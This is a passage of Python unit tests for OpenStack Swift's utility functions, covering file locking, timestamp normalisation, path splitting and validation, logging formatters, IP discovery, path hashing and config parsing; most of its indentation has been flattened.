actual = utils.decode_timestamps(test[0], False)
self._assertEqual(test[1], actual, test[0])
for explicit in (True, False):
for test in self.decodings:
actual = utils.decode_timestamps(test[0], explicit)
self._assertEqual(test[1], actual, test[0])
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def setUp(self):
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
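    # Taking lock_path on a directory that is already locked should raise
    # LockTimeout once the timeout expires.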
def test_lock_path(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1):
exc = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except LockTimeout as err:
exc = err
self.assertTrue(exc is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_lock_path_num_sleeps(self):
tmpdir = mkdtemp()
num_short_calls = [0]
exception_raised = [False]
def my_sleep(to_sleep):
if to_sleep == 0.01:
num_short_calls[0] += 1
else:
raise Exception('sleep time changed: %s' % to_sleep)
try:
with mock.patch('swift.common.utils.sleep', my_sleep):
with utils.lock_path(tmpdir):
with utils.lock_path(tmpdir):
pass
except Exception as e:
exception_raised[0] = True
self.assertTrue('sleep time changed' in str(e))
finally:
shutil.rmtree(tmpdir)
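        # lock_path polls with short 0.01s sleeps before backing off to a
        # longer sleep, which the mocked sleep turns into an exception.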
self.assertEqual(num_short_calls[0], 11)
self.assertTrue(exception_raised[0])
def test_lock_path_class(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is not None)
self.assertTrue(exc2 is None)
self.assertTrue(not success)
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is None)
self.assertTrue(exc2 is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
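    # normalize_timestamp always renders ten integer digits and five decimal
    # places, zero-padding as needed.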
def test_normalize_timestamp(self):
# Test swift.common.utils.normalize_timestamp
self.assertEqual(utils.normalize_timestamp('1253327593.48174'),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp(1253327593.48174),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp('1253327593.48'),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp(1253327593.48),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp('253327593.48'),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp(253327593.48),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp('1253327593'),
"1253327593.00000")
self.assertEqual(utils.normalize_timestamp(1253327593),
"1253327593.00000")
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
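    # Delete-at timestamps are whole seconds clamped to 0000000000-9999999999.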
def test_normalize_delete_at_timestamp(self):
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593.67890),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593.67890'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593.67890),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593.67890'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593.67890),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593'),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593.67890'),
'9999999999')
        self.assertRaises(
            ValueError, utils.normalize_delete_at_timestamp, '')
        self.assertRaises(
            ValueError, utils.normalize_delete_at_timestamp, 'abc')
def test_last_modified_date_to_timestamp(self):
expectations = {
'1970-01-01T00:00:00.000000': 0.0,
'2014-02-28T23:22:36.698390': 1393629756.698390,
'2011-03-19T04:03:00.604554': 1300507380.604554,
}
for last_modified, ts in expectations.items():
real = utils.last_modified_date_to_timestamp(last_modified)
self.assertEqual(real, ts, "failed for %s" % last_modified)
def test_last_modified_date_to_timestamp_when_system_not_UTC(self):
try:
old_tz = os.environ.get('TZ')
# Western Argentina Summer Time. Found in glibc manual; this
# timezone always has a non-zero offset from UTC, so this test is
# always meaningful.
os.environ['TZ'] = 'WART4WARST,J1/0,J365/25'
self.assertEqual(utils.last_modified_date_to_timestamp(
'1970-01-01T00:00:00.000000'),
0.0)
finally:
if old_tz is not None:
os.environ['TZ'] = old_tz
else:
os.environ.pop('TZ')
def test_backwards(self):
# Test swift.common.utils.backward
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = [b'123456789x12345678><123456789\n', # block larger than rest
b'123456789x123>\n', # block ends just before \n character
b'123423456789\n',
b'123456789x\n', # block ends at the end of line
b'<123456789x123456789x123\n',
b'<6789x123\n', # block ends at the beginning of the line
b'6789x1234\n',
b'1234><234\n', # block ends typically in the middle of line
b'123456789x123456789\n']
with TemporaryFile() as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEqual(line, lines[count].split(b'\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEqual([], list(utils.backward(f)))
def test_mkdirs(self):
testdir_base = mkdtemp()
testroot = os.path.join(testdir_base, 'mkdirs')
try:
self.assertTrue(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assertTrue(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assertTrue(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
finally:
rmtree(testdir_base)
def test_split_path(self):
        # Test swift.common.utils.split_path
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEqual(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEqual(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEqual(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEqual(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEqual(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEqual(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
# Test swift.common.utils.validate_device_partition
utils.validate_device_partition('foo', 'bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '', '')
self.assertRaises(ValueError,
utils.validate_device_partition, '', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo/bar', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', 'foo/bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '.', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, '..', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '.')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '..')
try:
utils.validate_device_partition('o\nn e', 'foo')
except ValueError as err:
self.assertEqual(str(err), 'Invalid device: o%0An%20e')
try:
utils.validate_device_partition('foo', 'o\nn e')
except ValueError as err:
self.assertEqual(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
# Test swift.common.utils.NullLogger
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEqual(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
        lfo_stdout = utils.LoggerFileObject(logger)
        lfo_stderr = utils.LoggerFileObject(logger, 'STDERR')
print('test1')
self.assertEqual(sio.getvalue(), '')
sys.stdout = lfo_stdout
print('test2')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo_stderr
print('test4', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
sys.stdout = orig_stdout
print('test5')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
print('test6', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
sys.stderr = orig_stderr
print('test8')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
lfo_stdout.writelines(['a', 'b', 'c'])
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\n')
lfo_stdout.close()
lfo_stderr.close()
lfo_stdout.write('d')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo_stdout.flush()
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
for lfo in (lfo_stdout, lfo_stderr):
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEqual(conf, conf_file)
# assert defaults
self.assertEqual(options['verbose'], False)
self.assertTrue('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEqual(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEqual(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['verbose'], True)
self.assertEqual(options['once'], True)
self.assertEqual(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assertTrue('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assertTrue('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_dump_recon_cache(self):
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
logger = utils.get_logger(None, 'server', log_route='server')
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(submit_dict, file_dict)
# Use a nested entry
submit_dict = {'key1': {'key2': {'value1': 1, 'value2': 2}}}
result_dict = {'key1': {'key2': {'value1': 1, 'value2': 2},
'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(result_dict, file_dict)
finally:
rmtree(testdir_base)
def test_dump_recon_cache_permission_denied(self):
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
class MockLogger(object):
def __init__(self):
self._excs = []
def exception(self, message):
_junk, exc, _junk = sys.exc_info()
self._excs.append(exc)
logger = MockLogger()
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
with mock.patch(
'swift.common.utils.NamedTemporaryFile',
side_effect=IOError(13, 'Permission Denied')):
utils.dump_recon_cache(submit_dict, testcache_file, logger)
self.assertIsInstance(logger._excs[0], IOError)
finally:
rmtree(testdir_base)
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warning('test1')
self.assertEqual(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEqual(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEqual(sio.getvalue(), 'test1\ntest3\n')
        # This doesn't really test that the log facility is truly being used
        # all the way to syslog, but it at least exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warning('test4')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
# Since socket on OSX is in /var/run/syslog, there will be
# a fallback to UDP.
expected_args.append(
((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEqual(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
@reset_logger_state
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEqual(strip_value(sio), '')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\n')
self.assertEqual(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\ntest\n')
self.assertEqual(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assertTrue('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
            self.assertTrue('my error message' not in log_msg)
self.assertTrue('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('ConnectionTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('MessageTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter_max_line_length(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
formatter = utils.SwiftLogFormatter(max_line_length=10)
handler.setFormatter(formatter)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
logger.info('12345')
self.assertEqual(strip_value(sio), '12345\n')
logger.info('1234567890')
self.assertEqual(strip_value(sio), '1234567890\n')
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12 ... de\n')
formatter.max_line_length = 11
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123 ... cde\n')
formatter.max_line_length = 0
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
formatter.max_line_length = 1
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1\n')
formatter.max_line_length = 2
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12\n')
formatter.max_line_length = 3
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123\n')
formatter.max_line_length = 4
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234\n')
formatter.max_line_length = 5
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12345\n')
formatter.max_line_length = 6
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123456\n')
formatter.max_line_length = 7
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1 ... e\n')
formatter.max_line_length = -10
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('txn' in log_msg)
self.assertTrue('12345' in log_msg)
# test no txn on info message
self.assertEqual(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('txn' not in log_msg)
self.assertTrue('12345' not in log_msg)
# test txn already in message
self.assertEqual(logger.txn_id, '12345')
logger.warning('test 12345 test')
self.assertEqual(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assertTrue('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' in log_msg)
self.assertTrue('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' not in log_msg)
self.assertTrue('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.warning('test 1.2.3.4 test 12345')
self.assertEqual(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
def test_storage_directory(self):
self.assertEqual(utils.storage_directory('objects', '1', 'ABCDEF'),
'objects/1/DEF/ABCDEF')
def test_expand_ipv6(self):
expanded_ipv6 = "fe80::204:61ff:fe9d:f156"
upper_ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(upper_ipv6))
omit_ipv6 = "fe80:0000:0000::0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(omit_ipv6))
less_num_ipv6 = "fe80:0:00:000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(less_num_ipv6))
def test_whataremyips(self):
myips = utils.whataremyips()
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_to_all(self):
for any_addr in ('0.0.0.0', '0000:0000:0000:0000:0000:0000:0000:0000',
'::0', '::0000', '::',
# Wacky parse-error input produces all IPs
'I am a bear'):
myips = utils.whataremyips(any_addr)
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_ip_specific(self):
self.assertEqual(['1.2.3.4'], utils.whataremyips('1.2.3.4'))
def test_whataremyips_error(self):
def my_interfaces():
return ['eth0']
def my_ifaddress_error(interface):
raise ValueError
with patch('netifaces.interfaces', my_interfaces), \
patch('netifaces.ifaddresses', my_ifaddress_error):
self.assertEqual(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
test_ipv6_address = '2001:6b0:dead:beef:2::32'
test_interface = 'eth0'
def my_ipv6_interfaces():
return ['eth0']
def my_ipv6_ifaddresses(interface):
return {AF_INET6:
[{'netmask': 'ffff:ffff:ffff:ffff::',
'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]}
with patch('netifaces.interfaces', my_ipv6_interfaces), \
patch('netifaces.ifaddresses', my_ipv6_ifaddresses):
myips = utils.whataremyips()
self.assertEqual(len(myips), 1)
self.assertEqual(myips[0], test_ipv6_address)
def test_hash_path(self):
        # Yes, these tests are deliberately very fragile. We want to make sure
        # that if someone changes what hash_path produces, they know about it.
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''):
self.assertEqual(utils.hash_path('a'),
'1c84525acb02107ea475dcd3d09c2c58')
self.assertEqual(utils.hash_path('a', 'c'),
'33379ecb053aa5c9e356c68997cbb59e')
self.assertEqual(utils.hash_path('a', 'c', 'o'),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=True),
'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
'\x00\xf4.\xb5\xea\x83')
self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
utils.HASH_PATH_PREFIX = 'abcdef'
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'363f9b535bfb7d17a43a46a358afca0e')
def test_validate_hash_conf(self):
# no section causes InvalidHashPathConfigError
self._test_validate_hash_conf([], [], True)
# 'swift-hash' section is there but no options causes
# InvalidHashPathConfigError
self._test_validate_hash_conf(['swift-hash'], [], True)
# if we have the section and either of prefix or suffix,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_prefix'], False)
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_suffix'], False)
# definitely, we have the section and both of them,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], False)
# But invalid section name should make an error even if valid
# options are there
self._test_validate_hash_conf(
['swift-hash-xxx'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], True)
def _test_validate_hash_conf(self, sections, options, should_raise_error):
class FakeConfigParser(object):
def read(self, conf_path):
return True
def get(self, section, option):
if section not in sections:
raise NoSectionError('section error')
elif option not in options:
raise NoOptionError('option error', 'this option')
else:
return 'some_option_value'
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
mock.patch('swift.common.utils.HASH_PATH_SUFFIX', ''), \
mock.patch('swift.common.utils.ConfigParser',
FakeConfigParser):
try:
utils.validate_hash_conf()
except utils.InvalidHashPathConfigError:
if not should_raise_error:
self.fail('validate_hash_conf should not raise an error')
else:
if should_raise_error:
self.fail('validate_hash_conf should raise an error')
def test_load_libc_function(self):
self.assertTrue(callable(
utils.load_libc_function('printf')))
self.assertTrue(callable(
utils.load_libc_function('some_not_real_function')))
self.assertRaises(AttributeError,
utils.load_libc_function, 'some_not_real_function',
fail_if_missing=True)
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEqual(result, expected)
self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEqual(result, expected)
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
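    # readconf on a conf.d directory merges every .conf file in sorted
    # filename order, so DEFAULT values from later files override earlier ones.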
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
